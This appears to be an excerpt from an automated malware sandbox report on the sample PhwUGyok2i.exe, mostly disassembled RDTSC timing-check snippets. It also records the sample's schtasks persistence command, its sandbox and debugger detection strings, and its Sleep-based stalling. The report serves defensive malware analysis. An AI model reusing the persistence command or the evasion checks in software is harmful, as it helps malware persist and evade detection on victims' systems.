Source: C:\Users\user\Desktop\PhwUGyok2i.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\PhwUGyok2i.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: PhwUGyok2i.exe, 00000000.00000003.2369565851.0000000007300000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A3AB7 second address: 16A3AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3E511046ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007F3E511046A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16A3AD3 second address: 16A3AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D4394 second address: 16D4398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D4398 second address: 16D439D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D439D second address: 16D43A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D43A3 second address: 16D43C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F3E51171E66h 0x00000012 popad 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3E51171E6Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D43C7 second address: 16D43CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D43CD second address: 16D43F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F3E51171E6Dh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F3E51171E68h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 169EC10 second address: 169EC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D7A85 second address: 16D7A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D802B second address: 16D803C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F3E511046A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D803C second address: 16D804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F3E51171E66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D81B2 second address: 16D81C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB5F6 second address: 16DB5FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB5FA second address: 16DB62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007F3E511046AEh 0x00000011 pop eax 0x00000012 mov edi, 2BAF20C7h 0x00000017 push 5E7E75DAh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3E511046AFh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DBB46 second address: 16DBB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DBD11 second address: 16DBD16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DBD16 second address: 16DBD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC7A4 second address: 16DC7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC7AA second address: 16DC7AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC8A7 second address: 16DC8C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC8C1 second address: 16DC8D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F3E51171E66h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F3E51171E66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC8D7 second address: 16DC8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DC9A6 second address: 16DC9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3E51171E66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF34 second address: 16DCF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF38 second address: 16DCF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnl 00007F3E51171E66h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF4A second address: 16DCF54 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3E511046ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCF54 second address: 16DCFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, 6492A281h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F3E51171E68h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov di, FE59h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+12A0347Dh], edx 0x00000034 mov si, 2DFDh 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jc 00007F3E51171E66h 0x00000042 jnl 00007F3E51171E66h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DCFA7 second address: 16DCFC2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3E511046ACh 0x00000008 jnl 00007F3E511046A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jng 00007F3E511046B0h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DD956 second address: 16DD95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFEE7 second address: 16DFF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jo 00007F3E511046B0h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jns 00007F3E511046A6h 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 jmp 00007F3E511046ACh 0x0000001d pop esi 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F3E511046A8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000000h 0x0000003c mov edi, ecx 0x0000003e mov dword ptr [ebp+12A0319Ah], edx 0x00000044 xchg eax, ebx 0x00000045 jne 00007F3E511046BBh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF5B second address: 16DFF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF5F second address: 16DFF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF63 second address: 16DFF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DFF69 second address: 16DFF6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E124C second address: 16E1256 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3E51171E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1CA4 second address: 16E1CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1EDB second address: 16E1EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1EDF second address: 16E1F46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F3E511046A8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 sub dword ptr [ebp+12A01B9Ch], edi 0x0000002f mov edi, dword ptr [ebp+12A03357h] 0x00000035 popad 0x00000036 jnl 00007F3E511046B5h 0x0000003c jmp 00007F3E511046AFh 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E1F46 second address: 16E1F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E3AFC second address: 16E3B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E3B00 second address: 16E3B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E40C5 second address: 16E40D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E4FC7 second address: 16E4FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E617A second address: 16E61EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F3E511046A8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F3E511046A8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 push 00000000h 0x00000044 mov bx, cx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b jl 00007F3E511046A6h 0x00000051 pop ecx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E52CB second address: 16E52CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E63F9 second address: 16E63FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E63FE second address: 16E640E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E73F5 second address: 16E7413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E8264 second address: 16E826F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3E51171E66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E7413 second address: 16E7418 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E7418 second address: 16E742E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F3E51171E72h 0x0000000e jc 00007F3E51171E6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E9485 second address: 16E9489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EB81B second address: 16EB885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F3E51171E68h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov di, bx 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+12A01ADDh], ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F3E51171E68h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr [ebp+12A03342h], eax 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jnp 00007F3E51171E66h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16E9489 second address: 16E949A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jne 00007F3E511046A6h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EB885 second address: 16EB889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EB889 second address: 16EB88F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16ED8F3 second address: 16ED8F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EBA7D second address: 16EBA87 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EEDE4 second address: 16EEE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+12A036CCh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F3E51171E68h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov dword ptr [ebp+12A03342h], ebx 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 jg 00007F3E51171E69h 0x0000003a mov cx, di 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 pushad 0x00000041 jmp 00007F3E51171E79h 0x00000046 jnc 00007F3E51171E66h 0x0000004c popad 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EE0BF second address: 16EE0C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EEE52 second address: 16EEE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EFF3D second address: 16EFFF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3E511046B6h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 jbe 00007F3E511046ACh 0x00000017 ja 00007F3E511046A6h 0x0000001d pop eax 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F3E511046A8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov dword ptr [ebp+12A01ADDh], eax 0x0000003f push 00000000h 0x00000041 call 00007F3E511046B9h 0x00000046 or dword ptr [ebp+12A02314h], eax 0x0000004c pop edi 0x0000004d push 00000000h 0x0000004f cmc 0x00000050 xchg eax, esi 0x00000051 jmp 00007F3E511046B6h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F3E511046ABh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16EFFF5 second address: 16EFFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F101A second address: 16F1020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F3EB8 second address: 16F3EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F4E63 second address: 16F4E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F4E69 second address: 16F4E6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F2F8B second address: 16F2FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F3E511046B7h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F4E6F second address: 16F4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F5E43 second address: 16F5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F5E48 second address: 16F5E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F5E4E second address: 16F5E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
